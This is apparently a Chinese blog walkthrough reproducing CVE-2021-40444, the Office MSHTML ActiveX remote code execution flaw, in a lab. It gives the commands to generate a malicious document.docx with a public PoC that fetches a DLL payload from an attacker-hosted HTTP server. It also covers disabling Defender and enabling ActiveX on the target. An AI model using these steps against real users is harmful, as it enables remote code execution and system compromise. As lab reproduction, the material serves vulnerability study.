CVE-2021-40444 Microsoft MSHTML RCE简单复现

漏洞概述：

2021年9月8日，微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞，攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用，成功诱导用户打开恶意文档后，可在目标系统上以该用户权限执行任意代码，微软在通告中指出已检测到该漏洞被在野利用，请相关用户采取措施进行防护。
[

](https://blog.csdn.net/weixin_42345596/article/details/120327007)
MSHTML是微软旗下的Internet Explorer浏览器引擎，也用于Office应用程序，以在Word、Excel或PowerPoint文档中呈现Web托管的内容，AcitveX控件是微软COM架构下的产物，在Windows的Office套件、IE浏览器中有广泛的应用，利用ActiveX控件即可与MSHTML组件进行交互。
影响范围

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems

漏洞复现

复现环境： win10(office10) , kali
下载POChttps://github.com/lockedbyte/CVE-2021-40444

安装lcab包

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make

进入CVE-2021-40444-master目录
执行命令

 python3 exploit.py generate test/calc.dll http://169.254.96.129:80

执行过后可以看到在out目录下生成了document.docx文件

开启http服务

python exploit.py host 80

配置靶机环境

靶机win10 关闭defender
win+R键输入gpedit.msc
![3NMF5[0_}C7T0]Q9MBH]EZC.png](https://img-blog.csdnimg.cn/img_convert/861917e87ac5732a3e2d11c87c498365.png#clientId=ucc126c04-be4a-4&from=drop&id=u064615fe&margin=[object Object]&name=3NMF5[0_}C7T0]Q9MBH]EZC.png&originHeight=282&originWidth=669&originalType=binary&ratio=1&size=81040&status=done&style=none&taskId=u00265442-cf4b-473c-8c0d-1f5fbd1788c)
点管理模板->Windows组件->Windows Defender防病毒程序

双击关闭实时防护
点击启用
![5@T@FCZF~}UGPXEEIV3}[{P.png](https://img-blog.csdnimg.cn/img_convert/9e8504ee3e18809a18fbd8cd19ca7bce.png#clientId=ucc126c04-be4a-4&from=drop&id=u9d13861e&margin=[object Object]&name=5@T@FCZF~}UGPXEEIV3}[{P.png&originHeight=386&originWidth=800&originalType=binary&ratio=1&size=47059&status=done&style=none&taskId=uf95dfbb8-97a1-4cc0-ab15-146f820b647)
打开IE浏览器设置找到Internet选项
点击安全

启用ActiveX 控件和插件
![%676AFO}9SFFJUK9DVEQ)PK.png](https://img-blog.csdnimg.cn/img_convert/3a35908bab28afd2be558250b62af868.png#clientId=ucc126c04-be4a-4&from=drop&id=u1ff498ff&margin=[object Object]&name=%676AFO}9SFFJUK9DVEQ)
靶机环境配置完毕！
使用ftp把document.docx文件拉到桌面
ftp:// ip地址 /

下载office2010用来打开document文件
下载地址
https://www.cr173.com/soft/10289.html
下载完直接安装就行

用word打开document文件
可以看到弹出了计算器窗口说明代码执行了

查看攻击机监听的80端口：打开文件时请求了/word.html页面